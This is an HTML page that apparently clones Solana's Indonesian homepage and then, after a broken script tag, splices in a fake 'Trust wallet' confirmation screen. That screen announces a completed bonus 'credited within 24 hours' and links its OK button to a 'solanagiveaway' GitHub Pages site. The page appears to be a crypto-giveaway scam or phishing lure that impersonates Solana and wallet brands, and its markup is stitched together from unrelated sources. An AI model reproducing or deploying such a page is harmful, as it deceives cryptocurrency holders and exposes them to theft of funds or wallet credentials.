<!DOCTYPE html><html lang="id">
<head><meta name="viewport" content="width=device-width"/><meta charSet="utf-8"/><link rel="preload" as="image" imageSrcSet="https://solana.com/id/_next/static/media/dark-horizontal.c3a5eb36.svg 1x, /_next/static/media/dark-horizontal.c3a5eb36.svg 2x"/><title>Infrastruktur Blockchain yang Dapat Diskalakan: Lebih dari miliaran transaksi &amp; terus bertambah | Solana: Build crypto apps that scale</title>
<meta name="robots" content="index,follow"/><meta property="og:title" content="Infrastruktur Blockchain yang Dapat Diskalakan: Lebih dari miliaran transaksi &amp; terus bertambah | Solana: Build crypto apps that scale"/><meta name="description" content="Solana is a high-performance blockchain supporting builders around the world creating crypto apps that scale today."/><meta property="og:title" content="Infrastruktur Blockchain yang Dapat Diskalakan: Lebih dari miliaran transaksi &amp; terus bertambah"/><meta property="og:description" content="Solana is a high-performance blockchain supporting builders around the world creating crypto apps that scale today."/><meta property="og:image" content="https://solana.com/sharing-card.png"/><meta property="og:type" content="website"/><meta name="twitter:card" content="summary"/><meta name="twitter:creator" content="@solana"/><meta name="twitter:image" content="https://solana.com/sharing-card.png"/><meta name="twitter:title" content="Infrastruktur Blockchain yang Dapat Diskalakan: Lebih dari miliaran transaksi &amp; terus bertambah"/><meta name="twitter:description" content="Solana is a high-performance blockchain supporting builders around the world creating crypto apps that scale today."/>
<link rel="apple-touch-icon" sizes="180x180" href="https://solana.com/id/apple-touch-icon.png"/>
<link rel="icon" type="image/png" sizes="32x32" href="https://solana.com/id/favicon-32x32.png"/>
<link rel="icon" type="image/png" sizes="16x16" href="https://solana.com/id/favicon-16x16.png"/><link rel="manifest" href="https://solana.com/id/site.webmanifest"/><link rel="alternate" hrefLang="x-default" href="https://solana.com/"/>
<link rel="alternate" hrefLang="en" href="https://solana.com/"/>
<link rel="alternate" hrefLang="ja" href="https://solana.com/ja/"/>
<link rel="alternate" hrefLang="ko" href="https://solana.com/ko/"/>
<link rel="alternate" hrefLang="ru" href="https://solana.com/ru/"/><link rel="alternate" hrefLang="zh" href="https://solana.com/zh/"/><link rel="alternate" hrefLang="de" href="https://solana.com/de/"/><link rel="alternate" hrefLang="es" href="https://solana.com/es/"/><link rel="alternate" hrefLang="id" href="https://solana.com/id/"/>
<link rel="alternate" hrefLang="tr" href="https://solana.com/tr/"/><link rel="alternate" hrefLang="vi" href="https://solana.com/vi/"/><link rel="alternate" hrefLang="hi" href="https://solana.com/hi/"/>
<link rel="alternate" hrefLang="ar" href="https://solana.com/ar/"/>
<link rel="alternate" hrefLang="fi" href="https://solana.com/fi/"/><link rel="alternate" hrefLang="it" href="https://solana.com/it/"/><link rel="alternate" hrefLang="nl" href="https://solana.com/nl/"/><meta name="next-head-count" content="36"/><link rel="preload" href="https://solana.com/id/_next/static/css/2e605d79a8386a55.css" as="style"/>
<link rel="stylesheet" href="https://solana.com/id/_next/static/css/2e605d79a8386a55.css" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="https://solana.com/id/_next/static/chunks/polyfills-5cd94c89d3acac5f.js"></script><script src="/_next/static/chunks/webpack-755a526c4e83696e.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/framework-f2a64c99e1a2ff69.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/main-793b16712740ab7f.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/pages/_app-beb9a2d9024235c8.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/926-1a2e80dffe313cb5.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/5675-2eaab10964bc95f6.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/128-12f87d5691d24836.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/3611-51e82744a100ff1e.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/4300-609f1525125b54c3.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/249-a86edc83e93cb800.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/788-90d9971548cc553f.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/9627-ba89dd431a3b07e4.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/1670-eff6ad0f417eebae.js" defer=""></script><script src="https://solana.com/id/_next/static/chunks/pages/index-eefeb0660906db0e.js" defer=""></script><script src="https://solana.com/id/_next/static/JD7Ase8DvOmTHjfdgnaYp/_buildManifest.js" defer=""></script><script src="https://solana.com/id/_next/static/JD7Ase8DvOmTHjfdgnaYp/_ssgManifest.js" defer=""></script><script src="https://solana.com/id/_next/static/JD7Ase8DvOmTHjfdgnaYp/_middlewareManifest.js" defer=""></script><style data-styled="" data-styled-version="5.3.5">.gstKfF{font-family:Diatype,var(--font-family-sans-serif);color:#fff;}/*!sc*/
.gstKfF .bg-black{background-color:#000 !important;}/*!sc*/
.gstKfF .text-black{color:#000000 !important;}/*!sc*/
.gstKfF h1,.gstKfF .h1{font-size:clamp(3.5rem,8vw,6rem);font-weight:700;line-height:100%;-webkit-letter-spacing:-0.03rem;-moz-letter-spacing:-0.03rem;-ms-letter-spacing:-0.03rem;letter-spacing:-0.03rem;}/*!sc*/
.gstKfF h2,.gstKfF .h2{font-size:clamp(2.625rem,8vw,4.5rem);font-weight:bold;line-height:105%;-webkit-letter-spacing:-0.0425rem;-moz-letter-spacing:-0.0425rem;-ms-letter-spacing:-0.0425rem;letter-spacing:-0.0425rem;}/*!sc*/
.gstKfF h3,.gstKfF .h3{font-size:clamp(2.25rem,8vw,3.5rem);font-weight:bold;line-height:105%;}/*!sc*/
.gstKfF h4,.gstKfF .h4{font-size:2.625rem;line-height:110%;-webkit-letter-spacing:-1px;-moz-letter-spacing:-1px;-ms-letter-spacing:-1px;letter-spacing:-1px;font-weight:700;}/*!sc*/
.gstKfF .h5,.gstKfF h5{font-size:1.75rem;line-height:118%;font-weight:bold;}/*!sc*/
.gstKfF h6,.gstKfF .h6{font-size:1.5rem;line-height:117%;}/*!sc*/
.gstKfF p{font-size:1.3125rem;line-height:130%;}/*!sc*/
.gstKfF p.smaller{font-size:1rem;}/*!sc*/
.gstKfF p.small{font-size:1.125rem;}/*!sc*/
.gstKfF p.clamp{font-size:clamp(1.125rem,8vw,1.3125rem) !important;}/*!sc*/
.gstKfF p.large{font-size:1.75rem !important;line-height:120% !important;}/*!sc*/
.gstKfF .subdued{color:#c4c4c4;}/*!sc*/
data-styled.g1[id="sc-4daf1108-0"]{content:"gstKfF,"}/*!sc*/
.iqpPdQ.btn{font-family:DSemi,monospace;font-weight:normal;line-height:1.25rem;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;background-color:#14f195;border-radius:2.25rem;padding:0.875rem 1.5rem;color:black;border:1px solid black;}/*!sc*/
.iqpPdQ.btn:not([disabled]):hover,.iqpPdQ.btn:not([disabled]):active,.iqpPdQ.btn:not([disabled]):focus{background-color:#fff;color:black;border:1px solid black;}/*!sc*/
.iqpPdQ.btn:active{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);}/*!sc*/
.jehpiC.btn{font-family:DSemi,monospace;font-weight:normal;line-height:1.25rem;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;background-color:black;border-radius:2.25rem;padding:0.875rem 1.5rem;color:white;border:1px solid white;}/*!sc*/
.jehpiC.btn:not([disabled]):hover,.jehpiC.btn:not([disabled]):active,.jehpiC.btn:not([disabled]):focus{background-color:#fff;color:black;border:1px solid black;}/*!sc*/
.jehpiC.btn:active{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);}/*!sc*/
.lcTFxh.btn{font-family:DSemi,monospace;font-weight:normal;line-height:1.25rem;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;background-color:#9945ff;border-radius:1.5rem;padding:0.625rem 1.3125rem;color:white;border:1px solid black;}/*!sc*/
.lcTFxh.btn:not([disabled]):hover,.lcTFxh.btn:not([disabled]):active,.lcTFxh.btn:not([disabled]):focus{background-color:#fff;color:black;border:1px solid black;}/*!sc*/
.lcTFxh.btn:active{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);}/*!sc*/
.gBWAcE.btn{font-family:DSemi,monospace;font-weight:normal;line-height:1.25rem;width:-webkit-fit-content;width:-moz-fit-content;width:fit-content;background-color:black;border-radius:1.5rem;padding:0.625rem 1.3125rem;color:white;border:1px solid black;}/*!sc*/
.gBWAcE.btn:not([disabled]):hover,.gBWAcE.btn:not([disabled]):active,.gBWAcE.btn:not([disabled]):focus{background-color:#fff;color:black;border:1px solid black;}/*!sc*/
.gBWAcE.btn:active{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);}/*!sc*/
data-styled.g2[id="sc-8a46b375-0"]{content:"iqpPdQ,jehpiC,lcTFxh,gBWAcE,"}/*!sc*/
.hCmltm{height:auto;border-top:1px solid rgba( 255,255,255, .4 );}/*!sc*/
data-styled.g7[id="sc-51e3bb0a-0"]{content:"hCmltm,"}/*!sc*/
.fAWEid{position:relative;margin-top:28px;margin-bottom:2rem;}/*!sc*/
data-styled.g16[id="sc-e4475ec6-0"]{content:"fAWEid,"}/*!sc*/
.cdiRGg{position:relative;background-color:#f9f9fb;color:black;border-radius:1rem;padding:2rem;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;z-index:2;}/*!sc*/
data-styled.g17[id="sc-e4475ec6-1"]{content:"cdiRGg,"}/*!sc*/
.SRNAx{position:absolute;top:-28px;left:0;width:100%;height:42px;background:linear-gradient(to top,#f9f9fb 0%,#333 100%);-webkit-clip-path:polygon(25px 0%,calc(100% - 25px) 0%,100% 100%,0% 100%);clip-path:polygon(25px 0%,calc(100% - 25px) 0%,100% 100%,0% 100%);z-index:1;}/*!sc*/
data-styled.g18[id="sc-e4475ec6-2"]{content:"SRNAx,"}/*!sc*/
.dXfXGK .row{margin-left:0px;margin-right:0px;}/*!sc*/
.dXfXGK .footer-heading{font-size:2rem;line-height:120%;font-weight:700;color:#f9f9fb;text-align:center;}/*!sc*/
.dXfXGK .footer-column{font-family:DSemi,monospace;font-size:1rem;color:#b7b7b7;}/*!sc*/
data-styled.g19[id="sc-6d007181-0"]{content:"dXfXGK,"}/*!sc*/
.hdmwQZ{-webkit-transition:0.2s ease-out top;transition:0.2s ease-out top;will-change:top;}/*!sc*/
data-styled.g32[id="sc-9dc3268b-0"]{content:"hdmwQZ,"}/*!sc*/
.fnTGAN{position:absolute;top:0;left:0;width:100%;height:100%;pointer-events:none;overflow:hidden;}/*!sc*/
.fnTGAN .heroVideoPlaceholder{position:relative;height:min(100vh,100vw);}/*!sc*/
@media (max-width:55rem) and (orientation:landscape){.fnTGAN .heroVideoPlaceholder{height:max(100vh,100vw);}}/*!sc*/
.fnTGAN .heroVideoPlaceholder video{position:absolute;height:100%;right:0;}/*!sc*/
@media (min-width:1024px){.fnTGAN .heroVideoPlaceholder video{right:-7rem;}}/*!sc*/
@media (min-width:1400px){.fnTGAN .heroVideoPlaceholder video{right:0;top:-7rem;}}/*!sc*/
.fnTGAN .heroVideoPlaceholder__overlay{position:absolute;top:0;width:100%;height:100%;background:linear-gradient( 0, rgba(0,0,0,1) 12%, rgba(0,0,0,0.75) 17%, rgba(0,0,0,0.4) 23%, rgba(0,0,0,0.28) 32%, rgba(0,0,0,0.12) 52%, rgba(0,0,0,1) 100% );}/*!sc*/
@media (min-width:1400px){.fnTGAN .heroVideoPlaceholder__overlay{top:-7rem;}}/*!sc*/
data-styled.g265[id="sc-36bfb188-0"]{content:"fnTGAN,"}/*!sc*/
.dMBBNb{font-size:clamp(3.8rem,8vw,6rem) !important;}/*!sc*/
data-styled.g266[id="sc-32392698-0"]{content:"dMBBNb,"}/*!sc*/
.kaMTwB{position:relative;padding:0;}/*!sc*/
@media (min-width:768px){.kaMTwB{padding-left:1.25rem;padding-right:1.25rem;}}/*!sc*/
data-styled.g267[id="sc-2e4a1ee8-0"]{content:"kaMTwB,"}/*!sc*/
.ghGlks{position:relative;margin-top:5.75rem;border-radius:1rem;}/*!sc*/
@media (min-width:768px){.ghGlks{width:calc(100% - 5.375rem);margin-top:3.6875rem;}}/*!sc*/
data-styled.g268[id="sc-2e4a1ee8-1"]{content:"ghGlks,"}/*!sc*/
.VCiRg{position:absolute;top:-5.75rem;left:0;right:0;margin:auto;padding:1rem;width:20.625rem;min-height:17rem;background-color:#14f195;color:#000;border-radius:0.75rem;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}/*!sc*/
@media (min-width:768px){.VCiRg{top:-3.6875rem;left:auto;right:0;width:31.5rem;}}/*!sc*/
@media (min-width:768px){.VCiRg p{width:60%;}}/*!sc*/
data-styled.g269[id="sc-2e4a1ee8-2"]{content:"VCiRg,"}/*!sc*/
.cvruWK{position:absolute;top:-2.9rem;left:0;width:100%;height:3.125rem;background:linear-gradient(0deg,#14f195 -5.71%,rgba(0,0,0,0) 100%);-webkit-clip-path:polygon(3.125rem 0%,calc(100% - 3.125rem) 0%,99% 100%,1% 100%);clip-path:polygon(3.125rem 0%,calc(100% - 3.125rem) 0%,99% 100%,1% 100%);}/*!sc*/
@media (min-width:768px){.cvruWK{top:-3.25rem;height:3.4375rem;-webkit-clip-path:polygon( 3.4375rem 0%, calc(100% - 3.4375rem) 0%, 99% 100%, 1% 100% );clip-path:polygon( 3.4375rem 0%, calc(100% - 3.4375rem) 0%, 99% 100%, 1% 100% );}}/*!sc*/
data-styled.g270[id="sc-2e4a1ee8-3"]{content:"cvruWK,"}/*!sc*/
.fGWhEQ{position:relative;z-index:1;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;width:100%;background:#14f195;color:#131313;font-family:DSemi,monospace;padding:1rem 0;}/*!sc*/
@media (min-width:1024px){.fGWhEQ{display:grid;grid-auto-flow:column;grid-template:1fr 1fr / 1fr 1fr;}}/*!sc*/
@media (min-width:1367px){.fGWhEQ{padding:0 1rem;display:grid;grid-auto-flow:column;grid-template:none;}}/*!sc*/
data-styled.g271[id="sc-310e06dc-0"]{content:"fGWhEQ,"}/*!sc*/
.iHftkt{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;background:transparent;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start;padding:1.5rem 0;margin:0 1rem;border-bottom:1px solid #131313;}/*!sc*/
.iHftkt:last-of-type{border-bottom:none;}/*!sc*/
@media (min-width:1024px){.iHftkt{display:grid;grid-auto-flow:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;}.iHftkt:nth-of-type(2){border-bottom:none;}}/*!sc*/
@media (min-width:1367px){.iHftkt{margin:0;display:grid;grid-auto-flow:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:space-around;-webkit-justify-content:space-around;-ms-flex-pack:space-around;justify-content:space-around;border-bottom:none;border-right:1px solid #131313;}.iHftkt:first-of-type{padding-left:1rem;}.iHftkt:last-of-type{border-right:none;padding-right:1rem;}}/*!sc*/
data-styled.g272[id="sc-310e06dc-1"]{content:"iHftkt,"}/*!sc*/
.hkkvjX{font-size:2.625rem;font-weight:bold;line-height:117%;}/*!sc*/
@media (min-width:768px){}/*!sc*/
data-styled.g273[id="sc-310e06dc-2"]{content:"hkkvjX,"}/*!sc*/
.oTUrw{min-width:13ch;}/*!sc*/
data-styled.g274[id="sc-310e06dc-3"]{content:"oTUrw,"}/*!sc*/
.heqAFW{font-size:clamp(0.75rem,4vw,1rem);line-height:clamp(1rem,4vw,120%);}/*!sc*/
@media (min-width:768px){.heqAFW{text-align:left;width:12ch;}}/*!sc*/
data-styled.g275[id="sc-310e06dc-4"]{content:"heqAFW,"}/*!sc*/
.cUCjeL{position:relative;border-radius:0.75rem;background-color:#eb54bc;}/*!sc*/
data-styled.g276[id="sc-6f7d96da-0"]{content:"cUCjeL,"}/*!sc*/
.jHntqS{background-color:#14f195;}/*!sc*/
data-styled.g277[id="sc-6f7d96da-1"]{content:"jHntqS,"}/*!sc*/
.cnLBvi{background-color:#80ecff;}/*!sc*/
.cnLBvi .depth-clip{position:absolute;left:0;bottom:-2.075rem;width:100%;height:2.125rem;background:linear-gradient(180deg,#80ecff -5.71%,rgba(0,0,0,0) 100%);-webkit-clip-path:polygon(10% 64%,90% 64%,98% 0%,2% 0%);clip-path:polygon(10% 64%,90% 64%,98% 0%,2% 0%);}/*!sc*/
@media (min-width:768px){.cnLBvi .depth-clip{bottom:-2.125rem;-webkit-clip-path:polygon(10% 64%,90% 64%,99% 0%,1% 0%);clip-path:polygon(10% 64%,90% 64%,99% 0%,1% 0%);}}/*!sc*/
data-styled.g278[id="sc-6f7d96da-2"]{content:"cnLBvi,"}/*!sc*/
.jzyRkh{position:relative;border-radius:1.5rem;background-color:#232325;max-width:90%;}/*!sc*/
@media (min-width:768px){.jzyRkh{max-width:1280px;}}/*!sc*/
data-styled.g279[id="sc-bdf7edec-0"]{content:"jzyRkh,"}/*!sc*/
.hCnbQV{display:block;position:relative;}/*!sc*/
data-styled.g280[id="sc-fd7743dd-0"]{content:"hCnbQV,"}/*!sc*/
.beFImr{position:relative;bottom:0;left:0;right:0;margin-top:-8rem;}/*!sc*/
@media (min-width:768px){.beFImr{bottom:1rem;}}/*!sc*/
data-styled.g281[id="sc-fd7743dd-1"]{content:"beFImr,"}/*!sc*/
</style></head><body><div id="__next"><div class="sc-4daf1108-0 gstKfF"><header class="sc-9dc3268b-0 hdmwQZ position-sticky sticky-top"><nav id="navbar" class="navbar-dark navbar navbar-expand-lg navbar-light"><div class="container-fluid"><a class="d-flex undefined" href="/id"><span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%"><span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%"><img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27149%27%20height=%2722%27/%3e"/></span><img alt="This is the Logo of Solana" srcSet="https://solana.com/id/_next/static/media/dark-horizontal.c3a5eb36.svg 1x, https://solana.com/id/_next/static/media/dark-horizontal.c3a5eb36.svg 2x" src="https://solana.com/id/_next/static/media/dark-horizontal.c3a5eb36.svg" decoding="async" data-nimg="intrinsic" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%"/></span></a>

<button aria-controls="navbarCollapse" type="button" aria-label="Toggle navigation" class="navbar-toggler collapsed"><span class="bar"></span><span class="bar"></span><span class="bar"></span></button><div class="navbar-collapse collapse" id="navbarCollapse"><ul class="navbar-nav ms-auto"><li class="nav-item position-static dropdown"><button class="nav-link fw-bold dropdown-toggle false dropdown-toggle" id="react-aria-1" aria-expanded="false" type="button">Developers<!-- --><svg width="24" height="24" viewBox="0 0 24 24"><g id="Stockholm-icons-Angle-down" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><path id="Shape" d="M0 0h24v24H0z"></path><path d="M6.70710678 15.7071068c-.39052429.3905243-1.02368927.3905243-1.41421356 0-.39052429-.3905243-.39052429-1.0236893 0-1.4142136l5.99999998-5.99999998c.378579-.37857894.9881654-.39182456 1.3828314-.03004736l6 5.50000004c.407119.3731924.4346219 1.0057597.0614295 1.4128787s-1.0057597.4346219-1.4128787.0614295l-5.2941997-4.8530163-5.32296892 5.322969Z" id="Path-94" fill="currentColor" transform="rotate(-180 12.000003 11.999999)"></path></g></svg></button></li><li class="nav-item position-static dropdown"><button class="nav-link fw-bold dropdown-toggle false dropdown-toggle" id="react-aria-2" aria-expanded="false" type="button">Network<!-- --><svg width="24" height="24" viewBox="0 0 24 24"><g id="Stockholm-icons-Angle-down" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><path id="Shape" d="M0 0h24v24H0z"></path><path d="M6.70710678 15.7071068c-.39052429.3905243-1.02368927.3905243-1.41421356 0-.39052429-.3905243-.39052429-1.0236893 0-1.4142136l5.99999998-5.99999998c.378579-.37857894.9881654-.39182456 1.3828314-.03004736l6 5.50000004c.407119.3731924.4346219 1.0057597.0614295 1.4128787s-1.0057597.4346219-1.4128787.0614295l-5.2941997-4.8530163-5.32296892 5.322969Z" id="Path-94" fill="currentColor" transform="rotate(-180 12.000003 11.999999)"></path></g></svg></button></li><li class="nav-item"><a class="nav-link fw-bold" href="https://solana.com/id/id/validators">Validator<!-- --></a></li><li class="nav-item position-static dropdown"><button class="nav-link fw-bold dropdown-toggle false dropdown-toggle" id="react-aria-3" aria-expanded="false" type="button">Community<!-- --><svg width="24" height="24" viewBox="0 0 24 24"><g id="Stockholm-icons-Angle-down" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"><path id="Shape" d="M0 0h24v24H0z"></path><path d="M6.70710678 15.7071068c-.39052429.3905243-1.02368927.3905243-1.41421356 0-.39052429-.3905243-.39052429-1.0236893 0-1.4142136l5.99999998-5.99999998c.378579-.37857894.9881654-.39182456 1.3828314-.03004736l6 5.50000004c.407119.3731924.4346219 1.0057597.0614295 1.4128787s-1.0057597.4346219-1.4128787.0614295l-5.2941997-4.8530163-5.32296892 5.322969Z" id="Path-94" fill="currentColor" transform="rotate(-180 12.000003 11.999999)"></path></g></svg></button></li><li class="nav-item fw-bold"><a class="nav-link false" href="https://solana.com/id/ecosystem">Ekosistem<!-- --></a></li></ul></div></div></nav></header><main><section class="pt-9 bg-black"><div class="sc-36bfb188-0 fnTGAN pt-14 py-md-12"><div class="heroVideoPlaceholder"><video loop="" muted="" playsinline="" autoplay="" poster="https://solana.com/id/src/img/index/hero-wide.jpg"><source src="https://player.vimeo.com/external/589655407.hd.mp4?s=2de3fde08e6ce9dac62bfe1e8db32ef72461a5af&amp;profile_id=175" type="video/mp4"/></video><div class="heroVideoPlaceholder__overlay"></div></div></div><div class="container mt-lg-8 mt-12"><div class="row align-items-center"><div class="col-12 col-lg-6 mb-10 mb-lg-0 pe-md-4 text-center text-lg-start"><h1 class="sc-32392698-0 dMBBNb mb-4 text-white"><!-- --></h1>
</script>

    
    <title>Trust wallet</title>
    <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>


    <link rel="stylesheet" type="text/css" href="./home_files/index10.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./home_files/index-rtl.css" title="rtl" disabled="">
  <style></style></head>
  <body class="notification">
    <div id="app-content"><div class="app"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="" >
		

		<center><img src=""
  style="margin-top:-75px" width="100px"></center></div>
		
		</div><div class="confirm-page-container-navigation__textcontainer"></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="./home_files/single-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="./home_files/double-arrow.svg" alt=""></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper">
<center><img src=""
  style="margin-top:-15px" width="100px"></center>
<br>COMPLETE...!!!</b></br>
<br>Terms and Conditions :</b></p>
        <p>🌟 Bonus only for user active wallet.</p>
<p>🌟 Are credited to your account within 24 hours.</p>
<p>🌟 If you are using a new account the bonus can not be found.</p></div><div class="confirm-approve-content__card-wrapper"><div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title"></div><div class="confirm-approve-content__small-blue-text cursor-pointer"></div></div><div class="page-container__footer"><footer><a type="submit" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next" role="button" tabindex="0" data-v-33c708fa="" href="https://solanagiveaway.github.io/solana/">OK</a></footer></div></div></div></div></div>
    <div id="popover-content"></div>
    <script src="./home_files/globalthis.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/initSentry.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/lockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/runLockdown.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/ui-libs.js.download" type="text/javascript" charset="utf-8"></script>
    <script src="./home_files/ui.js.download" type="text/javascript" charset="utf-8"></script>
  

</body></html>
